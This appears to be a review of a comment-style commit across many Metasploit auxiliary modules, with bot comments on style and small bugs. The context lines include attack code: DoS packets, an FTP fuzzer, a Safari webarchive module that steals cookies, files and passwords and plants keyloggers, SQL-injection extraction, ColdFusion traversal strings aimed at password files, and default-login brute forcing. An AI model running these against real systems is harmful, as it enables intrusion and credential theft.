p2_ecdhe << "\x03\xe5\xaa\x36\xeb\x0f\x52\x5a\xaf\xd0\x9f\xf8\xc7\xfe\x09\x69"
p2_ecdhe << "\x5b\x38\x95\x58\xb6\x0d\x27\x53\xe9\x63\xcb\x96\xb3\x54\x47\xa6"
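Review bot: Some of the realigned comments still disagree with the bytes they annotate: `"\x00\x08" # Cypher Suites Length: 6` encodes a length of 8, which matches the four two-byte suites that follow it, so it should read `# Cipher Suites Length: 8`; and `# Encrypted PresMaster (irrelevant)` should be `PreMaster`. Given this commit exists to correct comments, fixing these on lines it already touches would be consistent. The run method that builds these records extends beyond the lines shown in these hunks.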


@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run
#Attempt to crash IIS FTP
# Attempt to crash IIS FTP
begin
return unless connect_login
print_status('Checking if there is at least one directory ...')


@ -21,9 +21,9 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' =>
[
'x000 <3d3n[at]hotmail.com.br>', #Initial disclosure/exploit
'C4SS!0 G0M3S <Louredo_[at]hotmail.com>', #Metasploit submission
'sinn3r', #Metasploit edit/commit
'x000 <3d3n[at]hotmail.com.br>', # Initial disclosure/exploit
'C4SS!0 G0M3S <Louredo_[at]hotmail.com>', # Metasploit submission
'sinn3r', # Metasploit edit/commit
],
'License' => MSF_LICENSE,
'References' =>


@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run
#Send HELLO to target
# Send HELLO to target
connect_udp
print_status("Sending Crash request...")
udp_sock.put("HELLO0.83\0")
@ -44,13 +44,13 @@ class Metasploit3 < Msf::Auxiliary
return
end
#Send DOS packet
# Send DOS packet
connect_udp(global = true,'RPORT' => port)
print_status("Sending DoS packet to #{rhost}:#{port}...")
udp_sock.put("Kthxbai")
disconnect_udp
#Check is target is down
# Check is target is down
connect_udp
print_status("Checking target...")
udp_sock.put("HELLO0.83\0")


@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary
pkt['Payload'].v['DataLenLow'] = dlenlow #<==================
pkt['Payload'].v['DataOffset'] = doffset #<====
pkt['Payload'].v['DataOffsetHigh'] = 0xcccccccc #<====
pkt['Payload'].v['ByteCount'] = fillersize#<====
pkt['Payload'].v['ByteCount'] = fillersize #<====
pkt['Payload'].v['Payload'] = filler
simple.client.smb_send(pkt.to_s)


@ -40,9 +40,9 @@ class Metasploit3 < Msf::Auxiliary
delimiter = "\x00"*3
packet = [0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f,
0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,
0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,
0x00, 0x7e].pack("C*")
0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,
0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,
0x00, 0x7e].pack("C*")
packet << Rex::Text.rand_text_alphanumeric(126)
packet << delimiter
packet << Rex::Text.rand_text_alphanumeric(16)


@ -47,26 +47,18 @@ class Metasploit3 < Msf::Auxiliary
def support_ipv6?
false
end
#---------------------------------------------------------------------------------
def setup
super
@state = {}
end
#---------------------------------------------------------------------------------
def run
@fuzzsize=datastore['STARTSIZE'].to_i
exploit()
end
#---------------------------------------------------------------------------------
# Handler for new FTP client connections
#---------------------------------------------------------------------------------
def on_client_connect(c)
@state[c] = {
:name => "#{c.peerhost}:#{c.peerport}",
@ -75,20 +67,18 @@ class Metasploit3 < Msf::Auxiliary
:user => nil,
:pass => nil
}
#set up an active data port on port 20
# set up an active data port on port 20
print_status("Client connected : " + c.peerhost)
active_data_port_for_client(c, 20)
send_response(c,"","WELCOME",220," "+datastore['WELCOME'])
#from this point forward, on_client_data() will take over
# from this point forward, on_client_data() will take over
end
def on_client_close(c)
@state.delete(c)
end
#---------------------------------------------------------------------------------
# Active and Passive data connections
#---------------------------------------------------------------------------------
def passive_data_port_for_client(c)
@state[c][:mode] = :passive
if(not @state[c][:passive_sock])
@ -140,22 +130,17 @@ class Metasploit3 < Msf::Auxiliary
nil
end
#---------------------------------------------------------------------------------
# FTP Client-to-Server Command handlers
#---------------------------------------------------------------------------------
# FTP Client-to-Server Command handlers
def on_client_data(c)
#get the client data
# get the client data
data = c.get_once
return if not data
#split data into command and arguments
# split data into command and arguments
cmd,arg = data.strip.split(/\s+/, 2)
arg ||= ""
return if not cmd
#convert commands to uppercase and strip spaces
# convert commands to uppercase and strip spaces
case cmd.upcase.strip
when 'USER'
@ -247,7 +232,7 @@ class Metasploit3 < Msf::Auxiliary
return
when /^(LIST|NLST|LS)$/
#special case - requires active/passive connection
# special case - requires active/passive connection
print_status("Handling #{cmd.upcase} command")
conn = establish_data_connection(c)
if(not conn)
@ -289,7 +274,7 @@ class Metasploit3 < Msf::Auxiliary
return
when 'RETR'
#special case - requires active/passive connection
# special case - requires active/passive connection
print_status("Handling #{cmd.upcase} command")
conn = establish_data_connection(c)
if(not conn)
@ -353,11 +338,7 @@ class Metasploit3 < Msf::Auxiliary
return
end
#---------------------------------------------------------------------------------
# Fuzzer functions
#---------------------------------------------------------------------------------
# Do we need to fuzz this command ?
def fuzz_this_cmd(cmd)
@ -421,7 +402,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("* Fuzz data sent")
incr_fuzzsize()
else
#Do not fuzz
# Do not fuzz
cmsg = code.to_s + msg
cmsg = cmsg.strip
c.put("#{cmsg}\r\n")
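Review bot: The `run` method in the first hunk still reads `@fuzzsize=datastore['STARTSIZE'].to_i` and `exploit()`, which the commit's whitespace cleanup did not touch; `@fuzzsize = datastore['STARTSIZE'].to_i` and a bare `exploit` match the style guide the other fixes follow. In `on_client_data`, `return if not data` and `return if not cmd` read more naturally as `return unless data` / `return unless cmd`, and `cmd,arg = data.strip.split(/\s+/, 2)` wants a space after the comma. `on_client_data` continues past the end of its hunk.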


@ -175,14 +175,14 @@ class Metasploit3 < Msf::Auxiliary
else
datastr = "\r\n"
end
#first, check the original header fields and add some others - just for fun
# first, check the original header fields and add some others - just for fun
myheaders = @send_data[:headers]
mysendheaders = @send_data[:headers].dup
#get or post ?
# get or post ?
mysendheaders[:method] = form[:method].upcase
myheaders.each do | thisheader |
if not headers[thisheader[0]]
#add header if needed
# add header if needed
mysendheaders[thisheader[0]]= thisheader[1]
end
end
@ -300,7 +300,7 @@ class Metasploit3 < Msf::Auxiliary
def get_field_val(input)
tmp = input.split(/\=/)
#get delimeter
# get delimeter
tmp2 = tmp[1].strip
delim = tmp2[0,1]
if delim != "'" && delim != '"'
@ -316,7 +316,7 @@ class Metasploit3 < Msf::Auxiliary
body = body.gsub("\r","")
body = body.gsub("\n","")
bodydata = body.downcase.split(/<form/)
#we need part after <form
# we need part after <form
totalforms = bodydata.size - 1
print_status(" Number of forms : #{totalforms}")
formcnt = 0
@ -326,7 +326,7 @@ class Metasploit3 < Msf::Auxiliary
fdata = bodydata[formidx]
print_status(" - Enumerating form ##{formcnt+1}")
data = fdata.downcase.split(/<\/form>/)
#first, get action and name
# first, get action and name
formdata = data[0].downcase.split(/>/)
subdata = formdata[0].downcase.split(/ /)
namefound = false
@ -375,7 +375,7 @@ class Metasploit3 < Msf::Auxiliary
namefound = true
formfields = []
#input boxes
# input boxes
fieldtypemarks = [ '<input', '<select' ]
fieldtypemarks.each do | currfieldmark |
formfieldcnt=0
@ -386,7 +386,7 @@ class Metasploit3 < Msf::Auxiliary
if subdata.size > 1
subdata.each do | thisinput |
if skipflag == 1
#first, find the delimeter
# first, find the delimeter
fielddata = thisinput.downcase.split(/>/)
fields = fielddata[0].split(/ /)
fieldname = ""
@ -408,7 +408,7 @@ class Metasploit3 < Msf::Auxiliary
fieldid = get_field_val(thisfield)
end
if thisfield.match(/^value=/)
#special case
# special case
location = fielddata[0].index(thisfield)
delta = fielddata[0].size - location
remaining = fielddata[0][location,delta]
@ -518,13 +518,13 @@ class Metasploit3 < Msf::Auxiliary
formfound = response.body.downcase.index("<form")
if formfound
formdata = get_form_data(response.body)
#fuzz !
#for each form that needs to be fuzzed
# fuzz !
# for each form that needs to be fuzzed
formdata.each do | thisform |
if thisform[:name].length > 0
if ((datastore['FORM'].strip == "") || (datastore['FORM'].upcase.strip == thisform[:name].upcase.strip)) && (thisform[:fields].size > 0)
print_status("Fuzzing fields in form #{thisform[:name].upcase.strip}")
#for each field in this form, fuzz one field at a time
# for each field in this form, fuzz one field at a time
formfields = thisform[:fields]
formfields.each do | thisfield |
if thisfield[:name]
@ -537,7 +537,7 @@ class Metasploit3 < Msf::Auxiliary
end
print_status("Done fuzzing fields in form #{thisform[:name].upcase.strip}")
end
#fuzz headers ?
# fuzz headers ?
if datastore['FUZZHEADERS'] == true
print_status("Fuzzing header fields")
do_fuzz_headers(thisform,response.headers)
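Review bot: In `get_field_val`, `tmp = input.split(/\=/)` followed by `tmp2 = tmp[1].strip` splits on every `=`, so an attribute whose value itself contains `=` (a constructed example: `value="abc="`) is truncated to the text before the second `=`, and an attribute with no `=` at all leaves `tmp[1]` nil and raises NoMethodError on `.strip`. `name, rest = input.split('=', 2)` keeps the whole value, and a guard such as `return '' unless rest` turns the bare-attribute case into an empty value; whether an empty string is the right result for the callers depends on code outside this hunk. `get_field_val` ends outside the hunk.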


@ -137,7 +137,7 @@ class Metasploit3 < Msf::Auxiliary
rescue ::Exception => e
last_err = e
#ensure
# disconnect
#disconnect
end
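Review bot: The re-spaced `# disconnect` sits between a commented-out `#ensure` and a second `#disconnect`, so the `rescue ::Exception => e` block above it still has no cleanup path and the connection opened earlier in this method (outside the hunk) is not guaranteed to be closed when the error is stored in `last_err`. If leaving the socket open here is intentional, a comment saying why should replace the three dead lines; otherwise restoring `ensure` / `disconnect` is the fix. Separately, `rescue ::Exception` also traps `Interrupt` and `SystemExit`, so `rescue ::StandardError => e` (or the specific connection errors the method expects) is the safer net. The enclosing method starts before the hunk.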


@ -282,7 +282,7 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [String] the XML markup to insert into the webarchive for each unique
# iframe (we use one frame per site we want to steal)
# iframe (we use one frame per site we want to steal)
# @return '' if msf user does not want to poison cache
def webarchive_resources_for_poisoning_cache(url)
if not should_install_keyloggers? then return '' end
@ -320,14 +320,14 @@ class Metasploit3 < Msf::Auxiliary
|
end
# @param [script] hash containing HTTP headers from the request
# @param script [Hash] containing HTTP headers from the request
# @return [String] xml markup for serialized WebResourceResponse containing good
# stuff like HTTP/caching headers. Safari appears to do the following:
# NSKeyedArchiver *a = [[NSKeyedArchiver alloc] initForWritingWithMutableData:data];
# [a encodeObject:response forKey:@"WebResourceResponse"];
# stuff like HTTP/caching headers. Safari appears to do the following:
# NSKeyedArchiver *a = [[NSKeyedArchiver alloc] initForWritingWithMutableData:data];
# [a encodeObject:response forKey:@"WebResourceResponse"];
def web_response_xml(script)
# this is a serialized NSHTTPResponse, i'm too lazy to write a
# real encoder so yay lets use string interpolation.
# real encoder so yay lets use string interpolation.
# ripped this straight out of a webarchive save
script['content-length'] = script[:body].length
whitelist = %w(content-type content-length date etag
@ -507,7 +507,7 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [String] mark up for embedding the iframes for each URL in a place that is
# invisible to the user
# invisible to the user
def iframes_container_html
hidden_style = "position:fixed; left:-600px; top:-600px;"
wrap_with_doc do
@ -517,8 +517,8 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [String] javascript code, wrapped in script tags, that is inserted into the
# WebMainResource (parent) frame so that child frames can communicate "up" to the parent
# and send data out to the listener
# WebMainResource (parent) frame so that child frames can communicate "up" to the parent
# and send data out to the listener
def communication_js
wrap_with_script do
%Q|
@ -543,7 +543,7 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [String] javascript code, wrapped in a script tag, that steals the cookies
# and response body/headers, and passes them back up to the parent.
# and response body/headers, and passes them back up to the parent.
def steal_cookies_for_url(url)
wrap_with_script do
%Q|
@ -568,8 +568,8 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [String] javascript code, wrapped in a script tag, that steals local files
# and sends them back to the listener. This code is executed in the WebMainResource (parent)
# frame, which runs in the file:// protocol
# and sends them back to the listener. This code is executed in the WebMainResource (parent)
# frame, which runs in the file:// protocol
def steal_files
return '' unless should_steal_files?
urls_str = [datastore['FILE_URLS'], interesting_file_urls.join(' ')].join(' ')
@ -595,9 +595,9 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [String] javascript code, wrapped in a script tag, that steals autosaved form
# usernames and passwords. The attack first tries to render the target URL in an iframe,
# and steal populated passwords from there. If the site disables iframes through the
# X-Frame-Options header, we try popping open a new window and rendering the site in that.
# usernames and passwords. The attack first tries to render the target URL in an iframe,
# and steal populated passwords from there. If the site disables iframes through the
# X-Frame-Options header, we try popping open a new window and rendering the site in that.
def steal_form_data_for_url(url)
wrap_with_script do
%Q|
@ -663,8 +663,8 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [String] javascript code, wrapped in script tag, that adds a helper function
# called "sendData()" that passes the arguments up to the parent frame, where it is
# sent out to the listener
# called "sendData()" that passes the arguments up to the parent frame, where it is
# sent out to the listener
def injected_js_helpers
wrap_with_script do
%Q|
@ -678,7 +678,7 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [String] HTML markup that includes a script at the URL we want to poison
# We will then install the injected_js_keylogger at the same URL
# We will then install the injected_js_keylogger at the same URL
def trigger_cache_poison_for_url(url)
url_idx = urls.index(url)
scripts_to_poison[url_idx].map { |s|
@ -686,10 +686,10 @@ class Metasploit3 < Msf::Auxiliary
}.join
end
# @param [String] original_js the original contents of the script file
# @param original_js [String] the original contents of the script file
# @return [String] the poisoned contents. Once the module has found a valid 304'd script to
# poison, it "poisons" it by adding a keylogger, then adds the output as a resource with
# appropriate Cache-Control to the webarchive.
# poison, it "poisons" it by adding a keylogger, then adds the output as a resource with
# appropriate Cache-Control to the webarchive.
# @return [String] the original contents if msf user does not want to install keyloggers
def inject_js_keylogger(original_js)
if not should_install_keyloggers?
@ -726,7 +726,7 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [Array<Array<String>>] list of URLs provided by the user mapped to all of the linked
# javascript assets in its HTML response.
# javascript assets in its HTML response.
def all_script_urls(pages)
pages.map do |url|
results = []
@ -829,7 +829,7 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [Array<String>] of interesting file URLs to steal. Additional files can be stolen
# via the FILE_URLS module option.
# via the FILE_URLS module option.
def interesting_file_urls
[
'file:///var/log/weekly.out', # may contain usernames
@ -849,7 +849,7 @@ class Metasploit3 < Msf::Auxiliary
(datastore['URLS'] || '').split(/\s+/)
end
# @param [String] input the unencoded string
# @param input [String] the unencoded string
# @return [String] input with dangerous chars replaced with xml entities
def escape_xml(input)
input.to_s.gsub("&", "&amp;").gsub("<", "&lt;")
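Review bot: The `@return` tag on `escape_xml` says dangerous characters are replaced with XML entities but does not say which; the visible chain handles `&` and `<`, and whether `>`, `"` and `'` are also escaped (required when the result lands inside an attribute value) is not visible in this hunk, so the tag should enumerate the characters the chain actually escapes. In `web_response_xml`, the corrected `@param script [Hash] containing HTTP headers from the request` is still incomplete: the method reads `script[:body]` and writes `script['content-length']`, so the hash mixes symbol and string keys and is mutated by the call, which the `@param` text or a `@note` should state. Both methods end outside their hunks.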


@ -158,14 +158,14 @@ class Metasploit3 < Msf::Auxiliary
filename = ""
url = '/CFIDE/administrator/index.cfm'
# print_status("Getting index...")
# print_status("Getting index...")
res = send_request_cgi({
'uri' => url,
'method' => 'GET',
'Connection' => "keep-alive",
'Accept-Encoding' => "zip,deflate",
})
# print_status("Got back: #{res.inspect}")
# print_status("Got back: #{res.inspect}")
return if not res
return if not res.body or not res.code
return if not res.code.to_i == 200


@ -105,7 +105,7 @@ class Metasploit3 < Msf::Auxiliary
def srvqry(dom)
results = []
#Most common SRV Records
# Most common SRV Records
srvrcd = [
'_gc._tcp.', '_kerberos._tcp.', '_kerberos._udp.', '_ldap._tcp.',
'_test._tcp.', '_sips._tcp.', '_sip._udp.', '_sip._tcp.', '_aix._tcp.',


@ -51,7 +51,6 @@ class Metasploit3 < Msf::Auxiliary
], self.class)
end
#---------------------------------------------------------------------------------
def switchdns(target)
if not datastore['NS'].nil?
print_status("Using DNS Server: #{datastore['NS']}")
@ -71,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
end
#---------------------------------------------------------------------------------
def wildcard(target)
rendsub = rand(10000).to_s
query = @res.query("#{rendsub}.#{target}", "A")
@ -85,7 +84,7 @@ class Metasploit3 < Msf::Auxiliary
return false
end
end
#---------------------------------------------------------------------------------
def genrcd(target)
print_status("Retrieving general DNS records")
query = @res.search(target)
@ -167,7 +166,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
end
#---------------------------------------------------------------------------------
def tldexpnd(targetdom,nssrv)
target = targetdom.scan(/(\S*)[.]\w*\z/).join
target.chomp!
@ -178,13 +177,13 @@ class Metasploit3 < Msf::Auxiliary
i, a = 0, []
tlds = [
"com", "org", "net", "edu", "mil", "gov", "uk", "af", "al", "dz",
"as", "ad", "ao", "ai", "aq", "ag", "ar", "am", "aw", "ac","au",
"as", "ad", "ao", "ai", "aq", "ag", "ar", "am", "aw", "ac", "au",
"at", "az", "bs", "bh", "bd", "bb", "by", "be", "bz", "bj", "bm",
"bt", "bo", "ba", "bw", "bv", "br", "io", "bn", "bg", "bf", "bi",
"kh", "cm", "ca", "cv", "ky", "cf", "td", "cl", "cn", "cx", "cc",
"co", "km", "cd", "cg", "ck", "cr", "ci", "hr", "cu", "cy", "cz",
"co", "km", "cd", "cg", "ck", "cr", "ci", "hr", "cu", "cy", "cz",
"dk", "dj", "dm", "do", "tp", "ec", "eg", "sv", "gq", "er", "ee",
"et", "fk", "fo", "fj", "fi", "fr", "gf", "pf", "tf", "ga", "gm",
"et", "fk", "fo", "fj", "fi", "fr", "gf", "pf", "tf", "ga", "gm",
"ge", "de", "gh", "gi", "gr", "gl", "gd", "gp", "gu", "gt", "gg",
"gn", "gw", "gy", "ht", "hm", "va", "hn", "hk", "hu", "is", "in",
"id", "ir", "iq", "ie", "im", "il", "it", "jm", "jp", "je", "jo",
@ -221,7 +220,6 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------------------------------
def dnsbrute(target, wordlist, nssrv)
print_status("Running bruteforce against domain #{target}")
arr = []
@ -250,7 +248,6 @@ class Metasploit3 < Msf::Auxiliary
end
end
#-------------------------------------------------------------------------------
def bruteipv6(target, wordlist, nssrv)
print_status("Bruteforcing IPv6 addresses against domain #{target}")
arr = []
@ -283,7 +280,6 @@ class Metasploit3 < Msf::Auxiliary
#-------------------------------------------------------------------------------
def reverselkp(iprange,nssrv)
print_status("Running reverse lookup against IP range #{iprange}")
if not nssrv.nil?
@ -327,12 +323,12 @@ class Metasploit3 < Msf::Auxiliary
tl.delete_if { |t| not t.alive? }
end
end
#-------------------------------------------------------------------------------
#SRV Record Enumeration
# SRV Record Enumeration
def srvqry(dom,nssrv)
print_status("Enumerating SRV records for #{dom}")
i, a = 0, []
#Most common SRV Records
# Most common SRV Records
srvrcd = [
"_gc._tcp.","_kerberos._tcp.", "_kerberos._udp.","_ldap._tcp","_test._tcp.",
"_sips._tcp.","_sip._udp.","_sip._tcp.","_aix._tcp.","_aix._tcp.","_finger._tcp.",
@ -354,8 +350,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
#-------------------------------------------------------------------------------
#For Performing Zone Transfers
# For Performing Zone Transfers
def axfr(target, nssrv)
print_status("Performing zone transfer against all nameservers in #{target}")
if not nssrv.nil?
@ -387,7 +382,7 @@ class Metasploit3 < Msf::Auxiliary
:type => 'dns.enum',
:update => :unique_data,
:data => "Zone transfer successful")
#Prints each record according to its type
# Prints each record according to its type
zone.each do |response|
response.answer.each do |rr|
begin
@ -475,7 +470,7 @@ class Metasploit3 < Msf::Auxiliary
:data => "#{rr.host},#{rr.port},#{rr.priority},SRV")
end
rescue ActiveRecord::RecordInvalid
#Do nothing. Probably tried to store :host => 127.0.0.1
# Do nothing. Probably tried to store :host => 127.0.0.1
end
end
end
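Review bot: The `rescue ActiveRecord::RecordInvalid` with `# Do nothing. Probably tried to store :host => 127.0.0.1` drops a zone-transfer record silently, and the comment itself admits the cause is a guess; binding the exception and reporting it, `rescue ActiveRecord::RecordInvalid => e` / `vprint_error("Skipping #{rr.inspect}: #{e.message}")`, keeps the loop going while making the skipped records visible. Since the commit is about YARD, the methods whose separator lines it removed (`srvqry`, `axfr`, `dnsbrute`, `reverselkp`) could also gain `@param` tags; `dom`/`target` look like domain strings and `nssrv` is nil-checked before use, so `# @param nssrv [String, nil] nameserver to use instead of the default` is the likely shape but needs confirming against the callers. Each of these methods extends past its hunk.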


@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
'License' => MSF_LICENSE,
'Author' => [
'Michele Spagnuolo', # discovery, wrote rosetta encoder, disclosure
'joev' # msf module
'joev' # metasploit module
],
'References' =>
[


@ -84,10 +84,10 @@ class Metasploit4 < Msf::Auxiliary
fail_with("Error in server response")
end
#qgjuq is prepended to the result of the sql injection
#qirpq is appended to the result of the sql injection
#This allows the use of a simple regex to grab the contents
#of the file easily from the page source.
# qgjuq is prepended to the result of the sql injection
# qirpq is appended to the result of the sql injection
# This allows the use of a simple regex to grab the contents
# of the file easily from the page source.
file = /qgjuq(.*)qirpq/.match(resp.body)
file = file[0].gsub('qgjuq', '').gsub('qirpq', '')
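Review bot: `file = /qgjuq(.*)qirpq/.match(resp.body)` returns nil when the marker strings are absent from the response, so `file[0].gsub(...)` on the next line raises NoMethodError instead of reporting a failure the way the `fail_with("Error in server response")` branch above does. A guard such as `fail_with("Markers not found in response") unless file` before the `gsub` line, and reading the capture directly with `file = file[1]` instead of stripping both markers with two `gsub` calls, makes the parse both safer and simpler. The enclosing method continues outside the hunk.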


@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
return Exploit::CheckCode::Unknown
end
#Check PhP
# Check PhP
php_version = res['X-Powered-By']
if php_version
php_version = "#{php_version}"
@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
php_version = "PHP version unknown"
end
#Check Web-Server
# Check Web-Server
web_server = res['Server']
if web_server
web_server = "#{web_server}"
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
web_server = "unknown web server"
end
#Check forum MyBB
# Check forum MyBB
if res.body.match("&#077;&#089;&#066;&#066;")
print_good("#{peer} - MyBB forum found running on #{web_server} / #{php_version}")
return Exploit::CheckCode::Detected
@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary
return
end
#Resolve response
# Resolve response
if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/)
print_good("#{peer} - Running PostgreSQL Database")
elsif response.body.match(/General error\: 1 no such function\: REGEXP/)
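Review bot: `php_version = "#{php_version}"` under the re-spaced `# Check PhP` comment, and `web_server = "#{web_server}"` under `# Check Web-Server`, are no-op interpolations of values that are already strings; if the intent is to guard against a non-String header value, `php_version = php_version.to_s` says so, otherwise the two assignments can go. `res.body.match("&#077;&#089;&#066;&#066;")` builds a Regexp from a plain string and allocates a MatchData that is never used; `res.body.include?("&#077;&#089;&#066;&#066;")` expresses the same check. The comment could also read `# Check PHP` rather than `# Check PhP`.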


@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
end
#Search google.com for email's of target domain
# Search google.com for email's of target domain
def search_google(targetdom)
print_status("Searching Google for email addresses from #{targetdom}")
response = ""
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary
return emails.uniq
end
#Search Yahoo.com for email's of target domain
# Search Yahoo.com for email's of target domain
def search_yahoo(targetdom)
print_status("Searching Yahoo for email addresses from #{targetdom}")
response = ""
@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary
return emails.uniq
end
#Search Bing.com for email's of target domain
# Search Bing.com for email's of target domain
def search_bing(targetdom)
print_status("Searching Bing email addresses from #{targetdom}")
response = ""
@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary
return emails.uniq
end
#for writing file with all email's found
# for writing file with all email's found
def write_output(data)
print_status("Writing email address list to #{datastore['OUTFILE']}...")
::File.open(datastore['OUTFILE'], "ab") do |fd|


@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
#Trigger firmware bootstrap write out password data to URL root
# Trigger firmware bootstrap write out password data to URL root
def write
print_status("#{rhost}:#{jport} - Sending print job")
create_print_job = '%%XRXbegin' + "\x0a"


@ -23,8 +23,8 @@ class Metasploit3 < Msf::Auxiliary
},
'References' =>
[
[ 'URL', 'https://developer.apple.com/library/mac/#documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ],
[ 'URL', 'https://developer.apple.com/library/mac/#documentation/networking/conceptual/afp/AFPSecurity/AFPSecurity.html' ]
[ 'URL', 'https://developer.apple.com/library/mac/documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ],
[ 'URL', 'https://developer.apple.com/library/mac/documentation/networking/conceptual/afp/AFPSecurity/AFPSecurity.html' ]
],
'Author' => [ 'Gregory Man <man.gregory[at]gmail.com>' ],


@ -21,7 +21,7 @@ class Metasploit3 < Msf::Auxiliary
},
'References' =>
[
[ 'URL', 'https://developer.apple.com/library/mac/#documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ]
[ 'URL', 'https://developer.apple.com/library/mac/documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ]
],
'Author' => [ 'Gregory Man <man.gregory[at]gmail.com>' ],
'License' => MSF_LICENSE


@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary
sock.put(trojan_command(:nop))
print_status("#{ip}:#{rport} FOUND: #{files.inspect}")
## Add Vulnerability and Report
# Add Vulnerability and Report
report_vuln({
:host => ip,
:name => "Energizer DUO USB Battery Charger Software Arucer.dll Trojaned Distribution",


@ -31,9 +31,7 @@ class Metasploit3 < Msf::Auxiliary
begin
connect_udp
udp_sock.put(pkt)
res = udp_sock.read(1024).split(/\x00/)
if (res)


@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
#reportdata << "name: #{princ.unpack("H*")[0]}"
end
## Add Report
# Add Report
report_note(
:host => ip,
:proto => 'tcp',


@ -149,7 +149,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run
# Start caputure
# Start capture
open_pcap({'FILTER' => "icmp6"})
@netifaces = true


@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
],
'Author' =>
[
'xistence' #Vulnerability discovery and Metasploit module
'xistence' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'DisclosureDate' => "Jan 28 2014"


@ -198,7 +198,7 @@ class Metasploit3 < Msf::Auxiliary
end
#URL's that may work for you:
# URLs that may work for you:
#"/CFIDE/administrator/enter.cfm",
#"/CFIDE/wizards/common/_logintowizard.cfm",
#"/CFIDE/administrator/archives/index.cfm",
@ -206,7 +206,7 @@ end
#"/CFIDE/administrator/entman/index.cfm",
#"/CFIDE/administrator/logging/settings.cfm",
#Files to grab
# Files to grab
#../../../../../../../../../../ColdFusion8/lib/password.properties%00en
#../../../../../../../../../../CFusionMX7/lib/password.properties%00en
#../../../../../../../../../../opt/coldfusionmx7/lib/password.properties%00en


@ -105,7 +105,7 @@ class Metasploit4 < Msf::Auxiliary
# print table
print_line(membertbl.to_s)
#store username to loot
# store username to loot
report_note({
:host => rhost,
:port => rport,


@ -25,8 +25,8 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' =>
[
'hdm', #http_login module
'Michael Messner <devnull[at]s3cur1ty.de>' #dlink login included
'hdm', # http_login module
'Michael Messner <devnull[at]s3cur1ty.de>' #dlink login included
],
'References' =>
[
@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary
}
end
#default to user=admin without password (default on most dlink routers)
# default to user=admin without password (default on most dlink routers)
def do_login(user='admin', pass='')
vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
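Review bot: The new author line `'Michael Messner <devnull[at]s3cur1ty.de>' #dlink login included` keeps the `#text` form that this commit is converting to `# text` everywhere else, right under the corrected `'hdm', # http_login module`; `# dlink login included` would finish the job. The same pair of author comments in the next file section (`#http_login module` / `#dlink login included`) appears to be left in the old form as well.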


@ -23,8 +23,8 @@ class Metasploit3 < Msf::Auxiliary
devices. It is possible that this module also works with other models.
},
'Author' => [
'hdm', #http_login module
'Michael Messner <devnull[at]s3cur1ty.de>' #dlink login included
'hdm', #http_login module
'Michael Messner <devnull[at]s3cur1ty.de>' #dlink login included
],
'References' =>
[
@ -68,8 +68,8 @@ class Metasploit3 < Msf::Auxiliary
end
def is_dlink?
#the tested DIR-615 has no nice Server banner, gconfig.htm gives us interesting
#input to detect this device. Not sure if this works on other devices! Tested on v8.04.
# the tested DIR-615 has no nice Server banner, gconfig.htm gives us interesting
# input to detect this device. Not sure if this works on other devices! Tested on v8.04.
begin
response = send_request_cgi({
'uri' => '/gconfig.htm',
@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary
return false if response.nil?
return false if (response.code == 404)
#fingerprinting tested on firmware version 8.04
# fingerprinting tested on firmware version 8.04
if response.body !~ /var\ systemName\=\'DLINK\-DIR615/
return false
else
@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
#default to user=admin without password (default on most dlink routers)
# default to user=admin without password (default on most dlink routers)
def do_login(user='admin', pass='')
vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")


@ -83,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary
}
end
#default to user=admin without password (default on most dlink routers)
# default to user=admin without password (default on most dlink routers)
def do_login(user='admin', pass='')
